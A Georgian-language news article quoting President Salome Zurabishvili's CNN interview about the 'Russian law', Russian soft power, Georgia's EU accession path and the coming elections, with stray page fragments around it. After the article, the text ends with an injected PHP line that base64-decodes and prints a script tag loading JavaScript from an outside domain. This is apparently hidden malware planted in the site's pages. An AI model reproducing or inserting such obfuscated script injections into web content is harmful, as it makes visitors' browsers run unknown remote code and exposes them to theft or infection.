celsiusi
ავერსი შნაიდერი
 ქვეყანა სტაბილური უნდა დარჩეს და უნდა გავიმარჯვოთ არჩევნებზე ჩვენი გზით ევროპისკენ, არჩვენების თემა იქნება რუსეთი ან ევროპა და ეჭვი არ მეპარება, რას აირჩევს საქართველო, – ამის შესახებ საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა „სიენენთან“ ინტერვიუში განაცხადა.

ზურაბიშვილის თქმით, ახლა საქართველო უფრო ახლოს არის ევროკავშირთან, რადგან წლის ბოლოს შესაძლოა, გადავიდეს გაწევრიანების მოლაპარაკების ეტაპზე.

„საშინელი იდეაა, რადგან როგორც ქართულმა საზოგადოებამ ცხადად აჩვენა ქუჩაში გამოსვლით, ეს რუსული კანონია. ეს არის პუტინის კანონის ზუსტი ასლი, რომელიც რამდენიმე წლის უკან მიიღეს რუსეთში და გამოიყენეს სამოქალაქო საზოგადოების და არასამთავრობო ორგანიზაციების გასანადგურებლად. შარშან ეს კანონპროექტი წარადგინეს, მალევე უკან წაიღეს, შემდეგ მივიღეთ ევროკავშირის კანდიდატის სტატუსი მოსახლეობის დემონსტრაციების შედეგად. ახლა ჩვენ ერთი ნაბიჯით უფრო ახლოს ვართ ევროკავშირთან, რადგან წლის ბოლოს შესაძლოა, გადავიდეთ ევროკავშირში გაწევრიანების მოლაპარაკების ეტაპზე. ეს ძალიან მნიშვნელოვანი ნაბიჯია, ასე რომ, ახლა რუსეთმა დაიწყო ჰიბრიდული სტრატეგია, ისევ დაიწყო განხორციელება და ცდილობს ამ გზის შეჩერებას. დღეს ცხადია, ხელისუფლებაც ეხმარება. მე შემიძლია ვეტო დავადო ამ კანონს, მაგრამ ეს უფრო სიმბოლური ვეტოა, რადგან მათ შეუძლიათ ამ ვეტოს დაძლევა. ასე რომ, ახლა მთავარი საკითხია ჩვენი პარტნიორების ყურადღების მოზიდვა, რადგან ეს ასევე გამიზნულია პარტნიორებზე, ყველა საერთაშორისო ორგანიზაციაზე, რომლებიც მუშობენ საქართელოსთან დამოუკიდებლობის მოპოვების შემდეგ, რომლებიც არიან ჩვენი ინსტიტუტების, დემოკრატიისკენ ჩვენ გზაზე, ევროატლანტიკური ინტეგრაციის გზაზე ყველაზე ძლიერი მხარდამჭერები. ეს სინამდვილეში გეოპოლიტიკური ომია, რბილი ომი, არა სამხედრო მოქმედება, რასაც ვხედავთ უკრაინაში, სხვა ტიპის ქმედება, რაც ასევე იცის რუსეთმა, როგორ გაატაროს რბილი ძალა.

ეს არის რუსული რბილი ძალა, რაზეც ვსაუბრობ. რუსეთი ამ ქვეყანაში იყენებს სულ უფრო მეტ პროპაგანდას. ქვეყანაში არის უამრავი რუსი მიგრანტი, რომლებიც ფაქტობრივად ვერ კონტროლდებიან. რუსეთი იცნობს ამ ქვეყანას, რომელზეც ახორციელებდა იმპერიულ კონტროლს ბევრი წლის და საუკუნეების განმავლობაში. ჩვენ უკრაინის მსგავს სიტუაციაში ვართ, გვაქვს ორი ოკუპირებული ტერიტორია და რუსეთი ცდილობს, შეინარჩუნოს საქართველოზე გავლენა. ის ასევე ხედავს, რომ სომხეთი უერთდება კავკასიური ქვეყნების კლუბს, რომლებსაც სურთ ევროპისკენ სვლა. ეს რუსეთისთვის გეოსტრატეგიული, გეოპოლიტიკური ბრძოლაა. ჩვენ ევროკავშირის კანდიდატი ქვეყანა ვართ და ახლოს ვართ მოლაპარაკების დაწყების პროცესთან, რაც უკრაინამ და მოლდოვამ უკვე დაიწყეს. ძალიან ახლო კავშირები გვაქვს ევროკავშირთან და ყველა ქართველი თავს გრძნობს ევროპელად. ბოლო 30 წლის განმავლობაში საქართველოს მოსახლეობის 80 პროცენტს სურს ევროკაშირში და ევროატლანტიკურ სივრცეში გაწევრიანება. ეს არასდროს შეცვლილა ომის და ჩვენი ტერიტორიების ოკუპაციის მიუხედავად.

ჩვენი მოსახლეობის გადაწყვეტილება არასდროს შეიცვლება და ეს გადაწყვეტილება მიგვიყვანს ჩვენ ოქტომბრის არჩევნებზე. დარწმუნებული ვარ, რომ გასული წლის მსგავსად, წელს გადავალთ მოლაპარაკების დაწყების ეტაპზე. დარწმუნებული ვართ, ჩვენ შეგვიძლია, გვქონდეს ჩვენი ამერიკელი პარტნიორების იმედი, რადგან რომელი პარტიაც არ უნდა ყოფილიყო საქართველოს მმართელობაში, აშშ მტკიცედ უჭერდა მხარს საქართველოს დემოკრატიას. ცხადია, რომ ჩვენ საქართველოს მოქალაქეები საქართელოს მთავრობას, რომელიც ცხადად პრორუსულია, არასდროს მივცემთ უფლებას, გააგრძელოს მართვა, რადგან ეს ეწინააღმდეგება მის მთავარ, არსებით არჩევანს, რომელიც საქართველომ საუკუნეების წინ გააკეთა და ეს არ შეიცვლება. მე ვფიქრობ, ისინი საქართველოს სხვა მოქალაქეების მსგავს სიტუაციაში არიან, ჰყავთ შვილები, რომლებსაც სურთ სასწავლებლად წასვლა ევროპაში ან ამერიკაში. სამიდან ერთ ოჯახს ჰყავს ნათესავები აქვთ კონტაქტები ევროპაში ან აშშ-ში. ასე რომ, ეს ქვეყანა უკვე არის ევროპაში დიდწილად. მე არ მჯერა, რომ ვნახავთ ძალადობას. ვხედავთ, რომ მოსახლეობა მშვიდობიანია. რაც ვნახეთ ბოლო სამი დღის განმავლობაში, ეს არის მშვიდობიანი აქციები, სადაც ბევრი ახალგაზრდა იყო, რომლებიც მღერიან და ცეკვავენ. დარწმუნებული ვარ, ასეც გაგრძელდება. ეს გახდება სტრატეგია მომავალი არჩევნებისთვის. ჩვენ ამ ქვეყანაში აღარ გვჭირდება ჩამოგდება ან რადიკალური გადაწყვეტილებები. ეს ქვეყანა სტაბილური უნდა დარჩეს და ჩვენ უნდა გავიმარჯვოთ არჩევნებზე ჩვენი გზით ევროპისკენ. არჩვენების თემა იქნება რუსეთი ან ევროპა და ეჭვი არ მეპარება, რას აირჩევს საქართველო“, – განაცხადა ზურაბიშვილმა.

158
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");